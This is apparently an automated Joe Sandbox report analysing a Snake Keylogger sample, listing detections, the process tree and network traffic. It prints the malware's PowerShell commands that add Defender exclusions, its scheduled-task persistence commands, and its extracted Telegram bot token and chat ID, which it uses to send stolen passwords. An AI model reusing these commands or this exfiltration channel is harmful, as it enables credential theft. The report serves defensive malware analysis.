Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rPO0977-6745.exe

Overview

General Information

Sample name:rPO0977-6745.exe
Analysis ID:1480082
MD5:978148253c4b65b751fcd3cb4713f614
SHA1:cbd9c5fee022b52a38abdedd536d22310f1b0870
SHA256:c45dce6c441601cf7fd1c78d7697b3f3a5b1d27041417eb0ca7f26e98ccf1de9
Tags:exeSnakeKeylogger
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • rPO0977-6745.exe (PID: 1540 cmdline: "C:\Users\user\Desktop\rPO0977-6745.exe" MD5: 978148253C4B65B751FCD3CB4713F614)
    • powershell.exe (PID: 7012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7328 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6668 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rPO0977-6745.exe (PID: 2780 cmdline: "C:\Users\user\Desktop\rPO0977-6745.exe" MD5: 978148253C4B65B751FCD3CB4713F614)
    • rPO0977-6745.exe (PID: 2916 cmdline: "C:\Users\user\Desktop\rPO0977-6745.exe" MD5: 978148253C4B65B751FCD3CB4713F614)
  • EDyxAgkldisLe.exe (PID: 7276 cmdline: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe MD5: 978148253C4B65B751FCD3CB4713F614)
    • schtasks.exe (PID: 7928 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • EDyxAgkldisLe.exe (PID: 8004 cmdline: "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe" MD5: 978148253C4B65B751FCD3CB4713F614)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendMessage?chat_id=5535403842"}
SourceRuleDescriptionAuthorStrings
00000017.00000002.3693041192.0000000002960000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    0000000A.00000002.3693243826.0000000003180000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x14784:$a1: get_encryptedPassword
          • 0x14a70:$a2: get_encryptedUsername
          • 0x14590:$a3: get_timePasswordChanged
          • 0x1468b:$a4: get_passwordField
          • 0x1479a:$a5: set_encryptedPassword
          • 0x15de7:$a7: get_logins
          • 0x15d4a:$a10: KeyLoggerEventArgs
          • 0x159b5:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 34 entries
          SourceRuleDescriptionAuthorStrings
          11.2.EDyxAgkldisLe.exe.3a7de48.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            11.2.EDyxAgkldisLe.exe.3a7de48.2.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
              11.2.EDyxAgkldisLe.exe.3a7de48.2.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x12b84:$a1: get_encryptedPassword
              • 0x12e70:$a2: get_encryptedUsername
              • 0x12990:$a3: get_timePasswordChanged
              • 0x12a8b:$a4: get_passwordField
              • 0x12b9a:$a5: set_encryptedPassword
              • 0x141e7:$a7: get_logins
              • 0x1414a:$a10: KeyLoggerEventArgs
              • 0x13db5:$a11: KeyLoggerEventArgsEventHandler
              11.2.EDyxAgkldisLe.exe.3a7de48.2.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x1a5f0:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x19822:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x19c55:$a4: \Orbitum\User Data\Default\Login Data
              • 0x1ac94:$a5: \Kometa\User Data\Default\Login Data
              11.2.EDyxAgkldisLe.exe.3a7de48.2.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
              • 0x13758:$s1: UnHook
              • 0x1375f:$s2: SetHook
              • 0x13767:$s3: CallNextHook
              • 0x13774:$s4: _hook
              Click to see the 47 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO0977-6745.exe", ParentImage: C:\Users\user\Desktop\rPO0977-6745.exe, ParentProcessId: 1540, ParentProcessName: rPO0977-6745.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe", ProcessId: 7012, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO0977-6745.exe", ParentImage: C:\Users\user\Desktop\rPO0977-6745.exe, ParentProcessId: 1540, ParentProcessName: rPO0977-6745.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe", ProcessId: 7012, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe, ParentImage: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe, ParentProcessId: 7276, ParentProcessName: EDyxAgkldisLe.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp", ProcessId: 7928, ProcessName: schtasks.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO0977-6745.exe", ParentImage: C:\Users\user\Desktop\rPO0977-6745.exe, ParentProcessId: 1540, ParentProcessName: rPO0977-6745.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp", ProcessId: 6668, ProcessName: schtasks.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO0977-6745.exe", ParentImage: C:\Users\user\Desktop\rPO0977-6745.exe, ParentProcessId: 1540, ParentProcessName: rPO0977-6745.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe", ProcessId: 7012, ProcessName: powershell.exe

              Persistence and Installation Behavior

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO0977-6745.exe", ParentImage: C:\Users\user\Desktop\rPO0977-6745.exe, ParentProcessId: 1540, ParentProcessName: rPO0977-6745.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp", ProcessId: 6668, ProcessName: schtasks.exe
              No Snort rule has matched
              Timestamp:2024-07-24T15:08:36.970823+0200
              SID:2853006
              Source Port:49735
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-24T15:08:44.499518+0200
              SID:2853006
              Source Port:49741
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendMessage?chat_id=5535403842"}
              Source: rPO0977-6745.exe.2916.10.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendMessage"}
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeReversingLabs: Detection: 44%
              Source: rPO0977-6745.exeReversingLabs: Detection: 44%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeJoe Sandbox ML: detected
              Source: rPO0977-6745.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: rPO0977-6745.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49713 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49741 version: TLS 1.2
              Source: rPO0977-6745.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: ikFw.pdbSHA256 source: rPO0977-6745.exe, EDyxAgkldisLe.exe.0.dr
              Source: Binary string: ikFw.pdb source: rPO0977-6745.exe, EDyxAgkldisLe.exe.0.dr
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 08D1938Bh0_2_08D195B6
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 0144E61Fh10_2_0144E431
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 0144EFA9h10_2_0144E431
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 0144FA39h10_2_0144F778
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_0144E005
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_0144D7F0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_0144DE23
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 06BB88EDh10_2_06BB85B0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 06BB6119h10_2_06BB5E70
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 06BB72A2h10_2_06BB6FF8
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 06BB69C9h10_2_06BB6720
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 06BB0741h10_2_06BB0498
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 06BB76F9h10_2_06BB7450
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 06BB5869h10_2_06BB55C0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 06BB7FA9h10_2_06BB7D00
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 06BB6571h10_2_06BB62C8
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 06BB5CC1h10_2_06BB5A18
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 06BB6E21h10_2_06BB6B78
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_06BB3360
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_06BB3350
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 06BB7B51h10_2_06BB78A8
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 06BB0B99h10_2_06BB08F0
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 06BB02E9h10_2_06BB0040
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 06BB8401h10_2_06BB8158
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 4x nop then jmp 06BB53E9h10_2_06BB5140
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 08728633h11_2_0872885E
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 00E4E61Fh23_2_00E4E431
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 00E4EFA9h23_2_00E4E431
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 00E4FA39h23_2_00E4F77F
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h23_2_00E4D7F0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 064E88EDh23_2_064E85B0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 064E6119h23_2_064E5E70
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 064E5CC1h23_2_064E5A18
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 064E6571h23_2_064E62C8
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]23_2_064E3350
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]23_2_064E3360
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 064E6E21h23_2_064E6B78
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 064E69C9h23_2_064E6720
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 064E72A2h23_2_064E6FF8
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 064E02E9h23_2_064E0040
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 064E76F9h23_2_064E7450
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 064E0B99h23_2_064E08F0
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 064E0741h23_2_064E0498
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 064E7B51h23_2_064E78A8
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 064E53E9h23_2_064E5140
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 064E8401h23_2_064E8158
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 064E7FA9h23_2_064E7D00
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 4x nop then jmp 064E5869h23_2_064E55C0

              Networking

              barindex
              Source: unknownDNS query: name: api.telegram.org
              Source: Yara matchFile source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: POST /bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcac7a674eafb1Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: POST /bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcac9db89d7b60Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
